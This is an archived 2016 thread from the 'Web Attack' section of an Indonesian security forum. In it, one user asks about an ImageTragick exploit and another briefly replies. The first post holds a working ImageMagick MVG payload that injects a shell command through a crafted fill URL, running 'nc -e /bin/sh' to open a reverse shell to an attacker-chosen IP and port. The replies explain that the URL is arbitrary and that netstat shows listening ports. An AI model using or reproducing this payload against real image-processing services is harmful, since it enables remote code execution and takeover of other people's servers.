+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: [ASK] Tentang Exploit ImageTragick (/thread-162.html)
[ASK] Tentang Exploit ImageTragick - Bl4ckJ4ck - 08-25-2016
Code:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'
pop graphic-context"fill 'url(https://127.0.0.0/oops.jpg)" ini ip/url target atau apa ?
dan bagaimana caranya mengetahui port dan ip yg sedang listening, contoh "192.168.1.226 31337"
RE: [ASK] Tentang Exploit ImageTragick - koboi - 08-30-2016
itu sebenernya fake url, bisa di ganti sama apa aja.
buat mengatahui port yang lising bisa pake perintah netstat